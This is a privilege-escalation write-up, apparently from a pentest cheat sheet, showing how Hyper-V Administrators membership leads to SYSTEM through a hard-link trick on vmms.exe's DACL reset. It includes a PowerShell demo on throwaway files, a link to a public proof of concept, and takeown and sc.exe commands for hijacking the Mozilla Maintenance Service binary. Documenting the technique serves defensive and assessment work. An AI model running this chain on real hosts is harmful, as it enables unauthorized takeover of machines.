Hyper-V Administrators

This applies on a Windows host that has the Hyper-V role installed, i.e. the machine running the virtual machines. On such a host, membership in the local Hyper-V Administrators group gives a direct path to full Administrator/SYSTEM control of the host itself.

This blog post details the attack => https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/ with a PoC given at the end.

An overview of the attack:

  1. Delete VHDX: The attacker deletes a .vhdx file on which they hold Full Control (typically the disk of a VM they created themselves as a Hyper-V Administrator).

  2. Create Hard Link: At the path of the now-deleted .vhdx they create a hard link whose target is a file owned by SYSTEM that they cannot otherwise write, for example a service binary.

  3. Trigger Permission Reset: When vmms.exe, which runs as NT AUTHORITY\SYSTEM, restores the original permissions of the .vhdx, the DACL write is addressed to the .vhdx path, goes through the hard link and is applied to the target file instead.

  4. Gain Access: Because the restored DACL is the one the attacker's .vhdx originally had, which included the attacker's own Full Control, the attacker now has Full Control over the SYSTEM-owned target file.

Step 3 is the crux: vmms.exe writes the .vhdx's original DACL onto a file that is not the .vhdx at all. For this to be useful, our user must already have had permissions (ideally Full Control) on the .vhdx, because those are the permissions that get "restored" onto the target. The reason the write lands on the target is that NTFS stores the security descriptor on the file record, not on the file name: every hard link to a file shares the same DACL, so any ACL operation on one name affects all of them.
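To make the mechanism behind step 3 concrete, here is an added PowerShell example; it is not code from the original page or from decoder's hyperv-eop.ps1. It replays the hard-link swap against throwaway files in %TEMP%, with an ordinary Set-Acl by the current user standing in for the DACL write vmms.exe performs as SYSTEM, and then probes whether this host still lets an unprivileged user create a hard link to a file it cannot write (the precondition of step 2, which the mitigation mentioned at the end of this page addresses). The file names and contents are constructed for the demo; the hosts file is used only as a read-only probe target and is never modified.

```powershell
# Added example, not code from the original page or from decoder's hyperv-eop.ps1.
# Shows (a) why a DACL write through a hard link lands on the link target and
# (b) whether this host still allows the hard link the attack depends on.
# All files are throwaway files under %TEMP%; the hosts file is only probed.
$ErrorActionPreference = 'Stop'

# 0. Is the current user in the group this page is about?
$groupLines = whoami /groups | Select-String 'Hyper-V Administrators'
"Member of Hyper-V Administrators      : $([bool]$groupLines)"

# 1. Stand-ins: a fake .vhdx (what vmms.exe thinks it is touching) and a
#    fake victim file (stand-in for a SYSTEM-owned service binary).
$work     = Join-Path $env:TEMP ('hvlink-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $work | Out-Null
$fakeVhdx = Join-Path $work 'disk.vhdx'
$target   = Join-Path $work 'victim.exe'
Set-Content -Path $fakeVhdx -Value 'placeholder disk image'   # constructed content
Set-Content -Path $target   -Value 'original service binary'  # constructed content

$me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$explicitBefore = @((Get-Acl $target).Access | Where-Object { -not $_.IsInherited }).Count

# 2. Steps 1-2 of the attack: delete the .vhdx and reuse its name as a hard link.
Remove-Item -Path $fakeVhdx
New-Item -ItemType HardLink -Path $fakeVhdx -Target $target | Out-Null

# 3. Step 3: an ACL write addressed to the .vhdx name. In the real attack this
#    write is done by vmms.exe as SYSTEM; here the current user does it on a
#    file it owns, which is enough to show where the write lands.
$acl  = Get-Acl -Path $fakeVhdx
$rule = [System.Security.AccessControl.FileSystemAccessRule]::new($me, 'FullControl', 'Allow')
$acl.SetAccessRule($rule)
Set-Acl -Path $fakeVhdx -AclObject $acl

# 4. Step 4: the new explicit ACE is visible through the *target* name, because
#    NTFS keeps the security descriptor on the file record, not on the name.
$explicitAfter = @((Get-Acl $target).Access | Where-Object { -not $_.IsInherited }).Count
$landed = @((Get-Acl $target).Access | Where-Object {
    -not $_.IsInherited -and
    $_.IdentityReference.Value -eq $me -and
    $_.FileSystemRights -eq [System.Security.AccessControl.FileSystemRights]::FullControl
}).Count
"Explicit ACEs on victim before / after: $explicitBefore / $explicitAfter"
"Explicit FullControl for $me on victim: $($landed -gt 0)"

# 5. Precondition check: can this user hard-link a file it cannot write?
#    An unmitigated host allows it; a patched host refuses with access denied.
#    Needs %TEMP% and %SystemRoot% on the same volume (hard links cannot span volumes).
$protected = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
$probe     = Join-Path $work 'probe-hosts'
try {
    New-Item -ItemType HardLink -Path $probe -Target $protected | Out-Null
    "Hard link to $protected : CREATED (hard-link behaviour NOT mitigated)"
    Remove-Item -Path $probe
} catch {
    "Hard link to $protected : REFUSED ($($_.Exception.Message.Trim()))"
}

Remove-Item -Path $work -Recurse -Force
```

Run it as the low-privileged user you are assessing. The before/after ACE counts show the write landing on victim.exe even though it was addressed to disk.vhdx; the last line tells you whether step 2 of the real attack is still possible on this host.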

Attacking a service:

We use the PoC => https://github.com/decoder-it/Hyper-V-admin-EOP/blob/master/hyperv-eop.ps1 and set $targetfile to the executable of the service we want to hijack.

Once vmms.exe has rewritten the DACL we take ownership of the service binary (the path contains spaces, so it must be quoted). Ownership alone does not grant write access; if the restored DACL did not already give us Full Control, grant it explicitly before touching the file:

takeown /F "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Then we replace the service executable with a malicious one and start the service. The Mozilla Maintenance Service is a convenient target because it runs as LocalSystem and can be started by a standard user; any service with those two properties works the same way:

sc.exe start MozillaMaintenance

Note: This vector was mitigated by the March 2020 Windows security updates, which changed how Windows handles hard links. On a patched host, expect step 2 (creating the hard link to a file you cannot write) to fail; check that before spending time on the rest of the chain.
